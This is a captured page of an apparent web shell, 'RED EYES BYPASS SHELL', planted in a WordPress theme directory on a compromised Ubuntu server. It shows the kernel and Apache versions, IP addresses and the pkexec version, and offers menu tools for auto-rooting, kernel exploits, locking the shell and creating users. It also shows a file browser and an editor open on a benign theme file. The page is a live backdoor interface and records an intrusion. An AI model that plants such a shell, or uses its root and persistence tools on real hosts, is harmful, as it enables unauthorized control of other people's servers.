Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
garden-lawn-care /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
parts
[ DIR ]
drwxr-xr-x
patterns
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
block-patterns.php
816
B
-rwxr-xr-x
custom-setting.php
1.74
KB
-rwxr-xr-x
functions.php
5.41
KB
-rwxr-xr-x
license.txt
35.06
KB
-rwxr-xr-x
readme.txt
4.43
KB
-rwxr-xr-x
screenshot.png
371.24
KB
-rwxr-xr-x
style.css
31.95
KB
-rwxr-xr-x
theme.json
13.8
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : block-patterns.php
<?php /** * Garden Lawn Care: Block Patterns * * @since Garden Lawn Care 1.0 */ /** * Registers block patterns and categories. * * @since Garden Lawn Care 1.0 * * @return void */ function garden_lawn_care_register_block_patterns() { $block_pattern_categories = array( 'garden-lawn-care' => array( 'label' => __( 'Garden Lawn Care', 'garden-lawn-care' ) ), ); $block_pattern_categories = apply_filters( 'garden_lawn_care_block_pattern_categories', $block_pattern_categories ); foreach ( $block_pattern_categories as $name => $properties ) { if ( ! WP_Block_Pattern_Categories_Registry::get_instance()->is_registered( $name ) ) { register_block_pattern_category( $name, $properties ); } } } add_action( 'init', 'garden_lawn_care_register_block_patterns', 9 );
Close